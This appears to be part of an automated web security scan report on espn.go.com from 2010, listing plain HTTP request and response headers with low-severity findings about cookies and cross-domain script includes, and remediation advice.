HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:38 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=6C30C50F-3FA5-4E1B-8CEC-85BEDA536361; path=/; expires=Sat, 13-Nov-2030 18:16:38 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:36 GMT Content-Length: 65769 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/grid HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:08:56 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=1D412F0C-9BD5-4473-BD80-8939E9FF1376; path=/; expires=Sat, 13-Nov-2030 18:08:56 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/qualifying HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:09:52 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Set-Cookie: SWID=39DF27A4-B946-4ABA-9330-526504DDCAF5; path=/; expires=Sat, 13-Nov-2030 18:09:52 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/raceresults HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:09:26 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Set-Cookie: SWID=3A198C40-073F-4D07-B2C5-4759FF9B06AB; path=/; expires=Sat, 13-Nov-2030 18:09:26 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:08:36 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /racing/schedule/_/series/sprint HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:08:36 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=0F2EFF68-57CE-423C-8D40-61462BFBCFE6; path=/; expires=Sat, 13-Nov-2030 18:08:35 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:16:55 GMT Content-Length: 61978 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:08:36 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sports/format/design09/index/leagueInfo HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:43:39 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=D63082E1-5B30-4682-9CE2-7660FAC8CBED; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:45:54 GMT Content-Length: 338 Connection: close X-UA-Compatible: IE=EmulateIE7
<script id="ltabInitScript1289670220939"> // Because I don't have an ID on the tab container, // I'll use an ID on the script block and traverse siblings from there espn.core.init.tabs(jQuery ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:05 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sports/scores/window HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:05 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=C3047163-669F-485D-A1B6-1C4C4263C3AF; path=/; expires=Sat, 13-Nov-2030 17:44:05 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:20 GMT Content-Length: 8624 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:05 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sports/webslices/sport HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=257AFFE4-D60B-45D2-802B-F48D089FCC23; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:18 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sportsnation/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:18 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Set-Cookie: SWID=A665627E-B567-429A-B422-47DA6BE6E1AC; path=/; expires=Sat, 13-Nov-2030 18:17:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:17:24 GMT Content-Length: 165044 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:18 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:52 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sportsnation/polls HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:52 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=167E8A12-B4DB-4390-9328-BB7FCF0ECCE2; path=/; expires=Sat, 13-Nov-2030 18:16:52 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:33 GMT Content-Length: 36126 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sportsnation/rank HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:16:56 GMT Location: http://sports.espn.go.com/chat/sportsnation/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN09 Set-Cookie: SWID=0798070D-4099-45B2-9931-2256969C605D; path=/; expires=Sat, 13-Nov-2030 18:16:56 GMT; domain=.go.com; Content-Length: 215 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/chat/sportsnation/index ">http://sports.espn.go.com/chat/sportsnation/index </A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/category HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 18:15:42 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=2A6C3D3E-BA4D-41AB-9DAB-03C2C2F49008; path=/; expires=Sat, 13-Nov-2030 18:15:42 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/clip HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 18:15:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=C149951B-881F-4474-932C-82368E21BF35; path=/; expires=Sat, 13-Nov-2030 18:15:37 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/overlay HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 18:16:02 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=CA2AADAB-038D-46B9-A1A1-559A80C611B7; path=/; expires=Sat, 13-Nov-2030 18:16:02 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
7. Cross-domain script includepreviousnext There are 28 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /blog/ncfnation/tag HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:11 GMT Content-Type: text/html;charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=427C176E-6EA6-42A3-8194-2FBA103D60E1; path=/; expires=Sat, 13-Nov-2030 18:16:11 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:21:11 GMT InvH: blog-ncfnation Content-Length: 145036 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:11 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /college-football/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:07:58 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Set-Cookie: SWID=EB51C60F-0E86-4F96-8B62-80B778BC8886; path=/; expires=Sat, 13-Nov-2030 18:07:58 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:15:49 GMT Content-Length: 83996 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:07:58 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn/e60/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:14:31 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=8328CA99-7E19-45D9-B24B-026EDA221BDD; path=/; expires=Sat, 13-Nov-2030 18:14:31 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:13:37 GMT Content-Length: 51354 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn/page2/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:10:17 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=728CC4E3-9BE6-4205-A3DF-E9DA0266E6C4; path=/; expires=Sat, 13-Nov-2030 18:10:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:11:23 GMT Content-Length: 204429 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:10:17 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn/wire HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:11:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=A19DEC16-4216-4DBE-A447-B0B9BD2BC0A7; path=/; expires=Sat, 13-Nov-2030 18:11:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:34:32 GMT Content-Length: 47922 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:11:51 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn3/blackout HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:42:46 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:42:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Set-Cookie: SWID=3E9E537B-9B7A-49DF-A4A1-D86A917AAE72; path=/; expires=Sat, 13-Nov-2030 17:42:45 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:51:05 GMT Content-Length: 3253 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /espn3/player HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:51 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=5BDA550C-D9A4-4344-8666-B968112F604E; path=/; expires=Sat, 13-Nov-2030 17:40:20 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:41:12 GMT Content-Length: 21094 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /golf/leaderboard HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:09:54 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=82326F9A-B7D8-4515-B91E-C9E9CD83EE83; path=/; expires=Sat, 13-Nov-2030 18:09:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:05:03 GMT Content-Length: 148067 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:09:54 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
